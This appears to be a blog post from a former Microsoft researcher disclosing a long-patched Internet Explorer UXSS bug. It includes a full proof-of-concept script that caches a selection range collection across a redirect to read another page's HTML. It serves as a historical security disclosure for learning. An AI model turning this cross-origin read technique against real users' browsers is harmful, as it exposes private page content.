UXSS via Cached createRangeCollection After Redirect

Saving a reference to a createRangeCollection() result before a redirect, then accessing the collection member’s htmlText property after the redirect completes, gives access to the DOM of the redirected page. The technique follows the same cached-collection pattern as the earlier bugs but uses the selection range API.

var rngColl;

function main() {
    var win = window.open("redirect.aspx", "", "width=400,height=400");
    win.setTimeout('alert("Please, don\'t close this alert");');

    win.document.appendChild(win.document.createElement("body"));
    rngColl = win.document.selection.createRangeCollection(); // Save a createRange collection.

    setTimeout("accessRange()", 2000);
}

function accessRange() {
    try {
        alert(rngColl[0]);
    } catch (e) {
        alert(rngColl[0].htmlText); // Access the createRange collection after redirect.
    }
}

After the user’s alert keeps the window alive long enough for the redirect to complete, rngColl[0].htmlText returns the inner HTML of the redirected page’s document. The first access throws; the second succeeds. Tested on IE10 / IE11 build 20130312-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Sandbox Bypass via external.NavigateAndFind on a Sandboxed Window] :: [Information Disclosure: Detecting Visited URLs via CSS Expression Error Count] >